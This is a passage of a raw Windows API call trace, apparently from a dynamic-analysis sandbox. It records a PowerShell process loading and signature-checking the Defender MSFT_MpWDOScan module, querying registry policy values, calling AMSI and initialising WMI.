(in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0276.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x51, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", lpFilePart=0x0) returned 0x50 [0276.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c9c8) returned 1 [0276.790] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpwdoscan.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b83ccf0 | out: lpFileInformation=0x1b83ccf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c309006, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3889)) returned 1 [0276.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c978) returned 1 [0276.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0276.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x51, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", lpFilePart=0x0) returned 0x50 [0276.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0276.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x51, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", lpFilePart=0x0) returned 0x50 [0276.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c888) returned 1 [0276.790] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpwdoscan.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b83cbb0 | out: lpFileInformation=0x1b83cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c309006, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3889)) returned 1 [0276.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c838) returned 1 [0276.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0276.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x51, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", lpFilePart=0x0) returned 0x50 [0276.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca88) returned 1 [0276.791] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpwdoscan.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3b8 [0276.791] GetFileType (hFile=0x3b8) returned 0x1 [0276.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9f8) returned 1 [0276.791] GetFileType (hFile=0x3b8) returned 0x1 [0276.791] WTGetSignatureInfo () returned 0x0 [0276.823] CertDuplicateCertificateContext (pCertContext=0x1ad0a020) returned 0x1ad0a020 [0276.823] CryptCATHandleFromStore () returned 0x817b50 [0276.823] WTHelperGetProvSignerFromChain () returned 0x81acf0 [0276.823] WTHelperGetProvCertFromChain () returned 0x1aa10ae0 [0276.824] CertDuplicateCertificateContext (pCertContext=0x1ad0a320) returned 0x1ad0a320 [0276.824] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83caf8 | out: phkResult=0x1b83caf8*=0x5dc) returned 0x0 [0276.824] RegQueryValueExW (in: hKey=0x5dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b83cb48, lpData=0x0, lpcbData=0x1b83cb40*=0x0 | out: lpType=0x1b83cb48*=0x1, lpData=0x0, lpcbData=0x1b83cb40*=0x56) returned 0x0 [0276.824] RegQueryValueExW (in: hKey=0x5dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b83cb48, lpData=0x2756460, lpcbData=0x1b83cb40*=0x56 | out: lpType=0x1b83cb48*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b83cb40*=0x56) returned 0x0 [0276.825] RegCloseKey (hKey=0x5dc) returned 0x0 [0276.825] CoTaskMemAlloc (cb=0x10) returned 0x1ace7fd0 [0276.825] CoTaskMemAlloc (cb=0x50) returned 0x1acc7750 [0276.825] WinVerifyTrust () returned 0x0 [0276.826] CoTaskMemFree (pv=0x1acc7750) [0276.826] CoTaskMemFree (pv=0x1ace7fd0) [0276.826] CertFreeCertificateContext (pCertContext=0x1ad0a020) returned 1 [0276.826] CloseHandle (hObject=0x3b8) returned 1 [0276.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0276.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x51, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", lpFilePart=0x0) returned 0x50 [0276.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83cd48) returned 1 [0276.844] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpwdoscan.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3b8 [0276.844] GetFileType (hFile=0x3b8) returned 0x1 [0276.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83ccb8) returned 1 [0276.844] GetFileType (hFile=0x3b8) returned 0x1 [0276.845] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x0 [0276.845] ReadFile (in: hFile=0x3b8, lpBuffer=0x27575a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x27575a0*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0276.845] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x1000 [0276.845] ReadFile (in: hFile=0x3b8, lpBuffer=0x27575a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x27575a0*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0276.846] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x2000 [0276.846] ReadFile (in: hFile=0x3b8, lpBuffer=0x27575a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x27575a0*, lpNumberOfBytesRead=0x1b83cd58*=0x1000, lpOverlapped=0x0) returned 1 [0276.846] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x3000 [0276.846] ReadFile (in: hFile=0x3b8, lpBuffer=0x27575a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x27575a0*, lpNumberOfBytesRead=0x1b83cd58*=0x889, lpOverlapped=0x0) returned 1 [0276.846] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x3889 [0276.846] ReadFile (in: hFile=0x3b8, lpBuffer=0x2756979, nNumberOfBytesToRead=0x377, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x2756979*, lpNumberOfBytesRead=0x1b83cd58*=0x0, lpOverlapped=0x0) returned 1 [0276.846] SetFilePointer (in: hFile=0x3b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83ccd8*=0) returned 0x3889 [0276.846] ReadFile (in: hFile=0x3b8, lpBuffer=0x27575a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83cd58, lpOverlapped=0x0 | out: lpBuffer=0x27575a0*, lpNumberOfBytesRead=0x1b83cd58*=0x0, lpOverlapped=0x0) returned 1 [0276.847] CoTaskMemAlloc (cb=0x20c) returned 0x1acf1630 [0276.847] GetSystemDirectoryW (in: lpBuffer=0x1acf1630, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0276.847] CoTaskMemFree (pv=0x1acf1630) [0276.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0276.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0276.847] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca18) returned 1 [0276.847] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b83cd40 | out: lpFileInformation=0x1b83cd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x2cb24397, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0276.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9c8) returned 1 [0276.848] GetSystemInfo (in: lpSystemInfo=0x1b83cdc0 | out: lpSystemInfo=0x1b83cdc0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0276.848] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83ccc8 | out: phkResult=0x1b83ccc8*=0x5e0) returned 0x0 [0276.848] RegQueryValueExW (in: hKey=0x5e0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b83cd18, lpData=0x0, lpcbData=0x1b83cd10*=0x0 | out: lpType=0x1b83cd18*=0x0, lpData=0x0, lpcbData=0x1b83cd10*=0x0) returned 0x2 [0276.848] RegCloseKey (hKey=0x5e0) returned 0x0 [0276.848] CloseHandle (hObject=0x3b8) returned 1 [0276.868] CoCreateGuid (in: pguid=0x1b83ce58 | out: pguid=0x1b83ce58*(Data1=0xfd9bd625, Data2=0x78a7, Data3=0x4938, Data4=([0]=0xa3, [1]=0x7d, [2]=0x9d, [3]=0x8f, [4]=0x89, [5]=0x4b, [6]=0xe9, [7]=0x44))) returned 0x0 [0276.872] AmsiScanBuffer () returned 0x80070015 [0276.877] EtwEventWriteTransfer () returned 0x0 [0276.878] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c0a0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0276.878] EtwEventActivityIdControl () returned 0x0 [0276.878] EtwEventActivityIdControl () returned 0x0 [0276.878] EtwEventActivityIdControl () returned 0x0 [0276.879] EtwEventActivityIdControl () returned 0x0 [0276.879] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0276.880] EtwEventActivityIdControl () returned 0x0 [0276.880] EtwEventActivityIdControl () returned 0x0 [0276.880] EtwEventActivityIdControl () returned 0x0 [0276.880] EtwEventActivityIdControl () returned 0x0 [0276.880] CoCreateGuid (in: pguid=0x1b83c748 | out: pguid=0x1b83c748*(Data1=0xc53f427d, Data2=0x3884, Data3=0x4507, Data4=([0]=0x9e, [1]=0xd4, [2]=0x1, [3]=0x2f, [4]=0x42, [5]=0x33, [6]=0x99, [7]=0xdf))) returned 0x0 [0276.880] CoCreateGuid (in: pguid=0x1b83c748 | out: pguid=0x1b83c748*(Data1=0x12ed4630, Data2=0x5370, Data3=0x403c, Data4=([0]=0x8f, [1]=0xed, [2]=0xf, [3]=0xad, [4]=0x3f, [5]=0x3a, [6]=0xe3, [7]=0xfb))) returned 0x0 [0276.880] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0276.881] EtwEventActivityIdControl () returned 0x0 [0276.881] EtwEventActivityIdControl () returned 0x0 [0276.881] EtwEventActivityIdControl () returned 0x0 [0276.881] EtwEventActivityIdControl () returned 0x0 [0276.951] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83db78 | out: phkResult=0x1b83db78*=0x3b8) returned 0x0 [0276.952] RegQueryValueExW (in: hKey=0x3b8, lpValueName="appcompat", lpReserved=0x0, lpType=0x1b83dbc8, lpData=0x0, lpcbData=0x1b83dbc0*=0x0 | out: lpType=0x1b83dbc8*=0x0, lpData=0x0, lpcbData=0x1b83dbc0*=0x0) returned 0x2 [0276.952] RegCloseKey (hKey=0x3b8) returned 0x0 [0276.955] EtwEventActivityIdControl () returned 0x0 [0276.955] EtwEventActivityIdControl () returned 0x0 [0276.958] SetEvent (hEvent=0x7c0) returned 1 [0276.958] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b83e330*=0x7c0, lpdwindex=0x1b83e114 | out: lpdwindex=0x1b83e114) returned 0x0 [0276.967] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83e460, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0276.971] GetStdHandle (nStdHandle=0xfffffff4) returned 0x58 [0276.971] GetFileType (hFile=0x58) returned 0x2 [0276.971] GetConsoleMode (in: hConsoleHandle=0x58, lpMode=0x1b83e648 | out: lpMode=0x1b83e648) returned 1 [0277.247] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83e628 | out: lpConsoleScreenBufferInfo=0x1b83e628) returned 1 [0277.360] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83e628 | out: lpConsoleScreenBufferInfo=0x1b83e628) returned 1 [0280.308] EtwEventActivityIdControl () returned 0x0 [0280.308] EtwEventActivityIdControl () returned 0x0 [0280.308] EtwEventActivityIdControl () returned 0x0 [0282.672] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83de00, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0283.064] EtwEventActivityIdControl () returned 0x0 [0283.064] EtwEventActivityIdControl () returned 0x0 [0283.064] EtwEventActivityIdControl () returned 0x0 [0283.735] EtwEventActivityIdControl () returned 0x0 [0283.988] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348 [0283.988] CoCreateGuid (in: pguid=0x1b83e238 | out: pguid=0x1b83e238*(Data1=0x320fe40b, Data2=0x5969, Data3=0x4311, Data4=([0]=0x84, [1]=0xba, [2]=0x2, [3]=0xce, [4]=0xd3, [5]=0x97, [6]=0x98, [7]=0x93))) returned 0x0 [0286.751] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1a8bb840 [0286.754] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1a8bc0c0 [0287.135] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1a8ba740 [0287.147] GetModuleHandleA (lpModuleName="kernelbase.dll") returned 0x7fffca790000 [0287.148] GetProcAddress (hModule=0x7fffca790000, lpProcName="EncodePointer") returned 0x7fffccaa17e0 [0287.224] malloc (_Size=0x118) returned 0x818b90 [0287.353] MI_ApplicationWrapper_Initialize () returned 0x0 [0287.365] MI_Application_InitializeV1 () returned 0x0 [0287.366] MI_Helpers_SetClrIsNotShuttingDown () returned 0x0 [0287.367] malloc (_Size=0x18) returned 0x818cb0 [0287.743] malloc (_Size=0x100) returned 0x1aa108c0 [0287.743] __dllonexit () returned 0x7fffbdc359a0 [0287.743] __dllonexit () returned 0x7fffbdc359c0 [0287.743] __dllonexit () returned 0x7fffbdc359e0 [0287.743] __dllonexit () returned 0x7fffbdc35a00 [0287.743] MI_Application_InitializeV1 () returned 0x0 [0287.743] PublishDebugMessage () returned 0x1 [0287.744] GetProcessHeap () returned 0x530000 [0287.744] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xf8) returned 0x1a85c170 [0287.744] GetProcessHeap () returned 0x530000 [0287.744] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x1ace8490 [0287.744] GetProcessHeap () returned 0x530000 [0287.744] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x1ace84f0 [0287.744] GetProcessHeap () returned 0x530000 [0287.744] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x10) returned 0x1ace8330 [0287.744] GetProcessHeap () returned 0x530000 [0287.744] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1c) returned 0x1ace59a0 [0287.744] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7e8 [0287.744] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x628 [0287.744] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7fc [0287.744] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7f0 [0287.744] CreateThreadpoolWork (in: pfnwk=0x7fffbdc32100, pv=0x1a85c170, pcbe=0x1b83dd70 | out: pv=0x1a85c170) returned 0x1a85ae70 [0287.744] TpPostWork () returned 0x3 [0287.744] WaitForSingleObject (hHandle=0x7f0, dwMilliseconds=0xffffffff) returned 0x0 [0287.860] CloseHandle (hObject=0x7f0) returned 1 [0287.861] PublishDebugMessage () returned 0x1 [0287.861] GetProcessHeap () returned 0x530000 [0287.861] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x58) returned 0x1acedc40 [0287.861] GetProcessHeap () returned 0x530000 [0287.861] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x1ace8510 [0287.861] memcpy (in: _Dst=0x1ace8510, _Src=0x1ace8950, _Size=0xc | out: _Dst=0x1ace8510) returned 0x1ace8510 [0287.861] GetProcessHeap () returned 0x530000 [0287.861] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x1ace87f0 [0287.861] memcpy (in: _Dst=0x1ace87f0, _Src=0x1ace84b0, _Size=0xc | out: _Dst=0x1ace87f0) returned 0x1ace87f0 [0287.861] PublishDebugMessage () returned 0x1 [0287.861] GetProcessHeap () returned 0x530000 [0287.861] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x180) returned 0x1a830300 [0287.861] ??0WMISchema@@QEAA@XZ () returned 0x1a830300 [0287.861] GetProcessHeap () returned 0x530000 [0287.861] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x30) returned 0x1ad07650 [0287.861] GetProcessHeap () returned 0x530000 [0287.861] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x30) returned 0x1ad06a50 [0287.861] GetProcessHeap () returned 0x530000 [0287.861] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x1ace8530 [0287.861] GetProcessHeap () returned 0x530000 [0287.861] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x28) returned 0x1ace5490 [0287.861] PublishDebugMessage () returned 0x1 [0287.861] GetCurrentThread () returned 0xfffffffffffffffe [0287.861] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x2e, OpenAsSelf=1, TokenHandle=0x1a830468 | out: TokenHandle=0x1a830468*=0x7f0) returned 1 [0287.862] GetTokenInformation (in: TokenHandle=0x7f0, TokenInformationClass=0x3, TokenInformation=0x1b83dd00, TokenInformationLength=0x10, ReturnLength=0x1b83dd40 | out: TokenInformation=0x1b83dd00, ReturnLength=0x1b83dd40) returned 0 [0287.862] GetLastError () returned 0x7a [0287.862] GetProcessHeap () returned 0x530000 [0287.862] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x124) returned 0x1a8eaf40 [0287.862] GetTokenInformation (in: TokenHandle=0x7f0, TokenInformationClass=0x3, TokenInformation=0x1a8eaf40, TokenInformationLength=0x124, ReturnLength=0x1b83dd40 | out: TokenInformation=0x1a8eaf40, ReturnLength=0x1b83dd40) returned 1 [0287.862] AdjustTokenPrivileges (in: TokenHandle=0x7f0, DisableAllPrivileges=0, NewState=0x1a8eaf40*(PrivilegesCount=0x18, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=36, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=-699504503, Attributes=0x90001900), (Luid.LowPart=0x0, Luid.HighPart=28, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=1209730432, Attributes=0x7fff), (Luid.LowPart=0x7fff, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x7fff, Luid.HighPart=1207212000, Attributes=0x7fff), (Luid.LowPart=0x7fff, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0287.862] GetProcessHeap () returned 0x530000 [0287.863] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1a8eaf40) returned 1 [0287.863] ClassCache_New () returned 0x0 [0287.863] ResultToHRESULT () returned 0x0 [0287.863] PublishDebugMessage () returned 0x1 [0287.863] GetProcessHeap () returned 0x530000 [0287.863] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x1ace8970 [0287.864] PublishDebugMessage () returned 0x1 [0287.865] MI_Helpers_GetCurrentSecurityToken () returned 0x0 [0287.866] CoCreateGuid (in: pguid=0x1b83e0c8 | out: pguid=0x1b83e0c8*(Data1=0xf6ab7ced, Data2=0x3438, Data3=0x4189, Data4=([0]=0xa2, [1]=0xd6, [2]=0xa8, [3]=0x4b, [4]=0x7f, [5]=0x17, [6]=0xe9, [7]=0x63))) returned 0x0 [0288.040] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x278 [0288.040] CoCreateGuid (in: pguid=0x1b83e218 | out: pguid=0x1b83e218*(Data1=0x3eb1274a, Data2=0x89e1, Data3=0x4dd3, Data4=([0]=0x84, [1]=0x82, [2]=0x16, [3]=0x35, [4]=0xf, [5]=0x63, [6]=0xe0, [7]=0x14))) returned 0x0 [0288.104] GetComputerNameW (in: lpBuffer=0x1b83df30, nSize=0x1b83e258 | out: lpBuffer="PXTHFFRYO7", nSize=0x1b83e258) returned 1 [0288.164] EtwEventWriteTransfer () returned 0x0 [0288.171] GetComputerNameW (in: lpBuffer=0x1b83dc50, nSize=0x1b83df78 | out: lpBuffer="PXTHFFRYO7", nSize=0x1b83df78) returned 1 [0288.172] EtwEventWriteTransfer () returned 0x0 [0288.415] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1a8e5c60*=0x720, lpdwindex=0x1b83db54 | out: lpdwindex=0x1b83db54) returned 0x0 [0288.423] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x5db0d0*=0x80c, lpdwindex=0x1b83d844 | out: lpdwindex=0x1b83d844) returned 0x0 [0288.425] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83e018 | out: lpConsoleScreenBufferInfo=0x1b83e018) returned 1 [0288.591] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b83e018 | out: lpConsoleScreenBufferInfo=0x1b83e018) returned 1 [0288.622] GetConsoleOutputCP () returned 0x1b5 [0288.652] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b83ddd8, dwFlags=0x2 | out: 